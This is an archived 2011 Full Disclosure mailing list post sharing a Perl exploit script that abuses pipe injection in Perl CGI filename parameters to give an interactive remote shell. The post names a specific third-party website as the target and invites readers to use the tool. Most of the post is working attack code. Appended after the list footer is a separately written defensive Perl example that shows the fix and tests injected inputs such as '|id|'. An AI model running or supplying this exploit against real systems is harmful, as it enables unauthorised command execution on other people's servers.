Full Disclosure mailing list archives
Re: perl pipe exploit (drops you at a shell)
From: Marshall Whittaker <marshallwhittaker () gmail com>
Date: Sat, 15 Oct 2011 19:01:50 -0300
Well shit. It did send twice. :( Now I look like a goof, haha.

On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker <marshallwhittaker () gmail com> wrote:

This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it'll drop you at a shell. When using cd you must use the absolute path because I was too lazy to do it the correct way. ;-). I know this is pretty easy stuff, it works off those vulns that can just be exploited with a web browser, but this gives you a shell. So have at it guys & gals!

Had to resend because I got some message about my attachment being blocked. Not sure if it really was, though, I'll send again anyway. Hope this isn't spamming the list. =/

Site: http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File

Usage: ./sublime.pl "http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=" "&desc=Stat+File"

Should work on most perl cgi scripts that are vulnerable to the | read bug. Please note, it's not a "real" shell, but almost everything works, except things that won't go in one instance like cd-ing and env vars, etc. Play nice!

--oxagast

[CODE]
#!/usr/bin/perl
# adaptive cgi shell by oxagast
use LWP::Simple;

$part1 = @ARGV[0];
$part2 = @ARGV[1];

print "Making buffer...\n";
for $bet (100..200) {
    $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n";
}

print "Exploiting...\n";
$id = get("$part1\|id\|$part2");
$id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/;
print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n";
$uid = $1;
print "$uid\n";

while (0 == 0) {
    print "\$ ";
    $cmd = <STDIN>;
    chomp($cmd);
    if ($cmd =~ m/cd (\/.*)/) {
        $dir = $1;
    }
    if ($cmd eq "cd ..") {
        $dir =~ s/(.*)\/.*/\/\1/;
    }
    if ($cmd eq "pwd") {
        $dirjunk = $dir;
        if ($dirjunk eq "//") {
            $dirjunk = "/";
        }
    }
    $dirjunk = "cd $dir\;$cmd";
    $cmdhex = unpack("H*", "$dirjunk &>/tmp/cmdlnerr");
    $cmdhex =~ s/(..)/\\\\x$1/g;
    get("$part1\|echo -e $bettwo > /tmp/buff\|$part2");
    $backjunk2 = get("$part1\|cat /tmp/buff\|$part2");
    @backjunk = split("\n", $backjunk2);
    get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2");
    get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2");
    $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2");
    @backjunk_split = split("\n", $backjunk_as);
    $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2");
    $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m;
    $thismanylines = $1 - 1;
    for $junknum (0..scalar(@backjunk_split)) {
        for $fuzz (10..100+$thismanylines) {
            if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) {
                $middle = $1;
                @backjunk[$junknum] =~ m/(.*)\Q$middle\E/;
                @backjunk_split[$junknum] =~ s/$1//;
                @backjunk[$junknum] =~ m/\Q$middle\E(.*)/;
                @backjunk_split[$junknum] =~ s/$1//;
                print "$backjunk_split[$junknum]\n";
            }
        }
    }
}
[/CODE]
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
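The "perl pipe read bug" the post relies on is Perl's two-argument open(): a filename parameter that begins or ends with | is run as a command instead of being opened as a file. The following is an added defensive example, not code from the post or from the affected site; it shows the fix a CGI author would apply (three-argument open with an explicit mode, plus an allow-list on the filename) and assumes a hypothetical document directory /var/www/stats.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;

# Vulnerable pattern: two-argument open() lets a leading or trailing '|' in
# $filename turn the "file" into a command pipeline, so "|id|" executes id.
#   open(my $fh, $filename) or die ...;          # never do this with user input
#   open(my $fh, "$base/$filename") or die ...;  # still two-arg, still a pipe

# Hardened version: an explicit '<' mode can never spawn a process, and the
# name is validated and confined to the intended directory before use.
my $BASE = '/var/www/stats';   # assumed document directory (hypothetical)

sub safe_stats_path {
    my ($filename) = @_;
    # Allow only simple relative names of safe characters ending in .htm;
    # this also rejects '|', ';', '..' and absolute paths outright.
    return undef unless defined $filename
        && $filename =~ m{\A(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_-]+\.htm\z};
    my $canon = File::Spec->canonpath(File::Spec->catfile($BASE, $filename));
    # Belt and braces: the normalised path must still live under $BASE.
    return undef unless index($canon, "$BASE/") == 0;
    return $canon;
}

sub read_stats_file {
    my ($filename) = @_;
    my $path = safe_stats_path($filename);
    die "rejected filename\n" unless defined $path;
    open(my $fh, '<', $path) or die "cannot open $path: $!\n";  # 3-arg open
    local $/;
    my $content = <$fh>;
    close $fh;
    return $content;
}

# Constructed sample inputs: the benign value from the post, the shape of the
# injected parameter it abuses, and two other classic bad names.
for my $input ('stats/1966vinmatrix.htm', '|id|', '../../etc/passwd', 'x.htm|') {
    my $path = safe_stats_path($input);
    printf "%-26s => %s\n", $input, defined $path ? "ok: $path" : 'REJECTED';
}
```

Only the first input is accepted; the three injected or traversing names are rejected before any open() is attempted, and even an accepted name goes through a read-only three-argument open.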